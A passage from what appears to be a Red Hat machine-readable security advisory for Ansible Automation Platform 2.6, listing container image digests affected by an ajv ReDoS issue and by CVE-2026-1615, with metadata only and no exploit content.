"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "ajv: ReDoS via $data reference"
},
{
"cve": "CVE-2026-1615",
"cwe": {
"id": "CWE-94",
"name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
},
"discovery_date": "2026-02-09T11:10:57.572082+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
